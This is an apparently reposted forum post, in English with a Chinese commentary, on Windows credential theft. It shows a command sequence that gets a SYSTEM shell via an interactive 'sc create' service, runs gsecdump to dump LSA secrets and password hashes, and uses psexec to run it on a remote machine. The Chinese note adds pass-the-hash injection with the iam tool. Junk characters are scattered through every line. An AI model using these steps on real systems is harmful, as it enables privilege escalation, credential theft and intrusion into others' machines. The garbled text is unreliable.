o get a DOS Prompt as NT system:5 B" ^% E# [) K; {
6 G1 O {& `' v" s
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact9 ~% N6 ]* o E0 `4 J
[SC] CreateService SUCCESS
7 |3 u, d' W$ j1 v" a; h; ?5 D1 z+ ]' ~' A9 V6 M$ D
C:\>sc start shellcmdline
+ F9 ?- X; y2 S4 u! G+ u" E[SC] StartService FAILED 1053:
! x; k8 D2 [6 f" f1 r8 r9 e" j! f
6 s* i% ~, J' y+ L* x. I" y. {. N1 IThe service did not respond to the start or control request in a timely fashion.
& Z* W% y% Y( i, @: A/ h0 Q4 ?2 f+ v! ?3 W3 @ Q
C:\>sc delete shellcmdline
2 D) C% D4 J. m' P% M[SC] DeleteService SUCCESS
3 r) l+ {% B3 D$ L ?
3 I( D2 _0 E" l8 [# e" T1 }------------
2 O! a/ c% T' }& |' H' v- c
1 {: {# r8 x, d9 u- Z, }Then in the new DOS window:
5 b+ O# g+ q" ]: s: X' C
H0 M: h6 e( T# f$ I5 {Microsoft Windows XP [Version 5.1.2600]
2 D8 T3 k, a9 o& e0 N& s/ Z% N(C) Copyright 1985-2001 Microsoft Corp.
/ `4 R7 P0 T) t3 @
" U5 c4 U" X5 gC:\WINDOWS\system32>whoami
2 O$ C, t C/ ]; m* X5 Q2 A: rNT AUTHORITY\SYSTEM8 L8 l9 F" `0 r1 b! o7 Z
* i( u6 C* }" P* w p6 RC:\WINDOWS\system32>gsecdump -h
$ i2 R J1 q2 Y, x* p9 T3 h" C" _gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
7 y- q/ @* H0 Q4 O1 i' ^usage: gsecdump [options]
& n' C0 P& l1 c g- k
8 k$ u: i+ N6 E# w& ]; Foptions:
* ~: _# `: v, @8 d-h [ --help ] show help4 X5 G2 d% r' I; R
-a [ --dump_all ] dump all secrets
* y! S) `# }9 c) W* J# k-l [ --dump_lsa ] dump lsa secrets, p9 s+ d1 B$ ~
-w [ --dump_wireless ] dump microsoft wireless connections
; M# B- `; K; z" R2 z-u [ --dump_usedhashes ] dump hashes from active logon sessions
' i* u9 [0 r+ }8 @% e1 B9 X-s [ --dump_hashes ] dump hashes from SAM/AD& u/ ~/ V- Q4 ]; p( p. G% f0 r% g
/ [) r' l q, R1 @) l0 J5 |8 I
Although I like to use:# O" b( E4 B( r/ S
- g% F" `" P) Y0 uPsExec v1.83 - Execute processes remotely
. V$ e; d# u: K( jCopyright (C) 2001-2007 Mark Russinovich
: U( M+ |& r! f7 |- fSysinternals - 链接标记[url]www.sysinternals.com[/url]3 W1 x/ |" X: q# R9 p* T2 t6 x
0 k u& B0 m% I3 q# X i
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT9 K Q8 z8 h$ {1 U
' m, [: j9 `6 @) v& y6 Xto get the hashes from active logon sessions of a remote system.
- V7 }# c; t4 T2 o# T
1 y) S2 K& J; L3 p; r& tThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
. L7 [/ q: N' T. t, T1 E/ [, N, x0 `& I0 `7 c% f/ x; ~; y
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.! Q4 C( h" i8 l& `# |/ Y) t
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]% ?( g9 g' F/ y2 c6 c z, R
% B. m8 ~2 U* B2 t# E
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。- }( F5 @0 y, H
|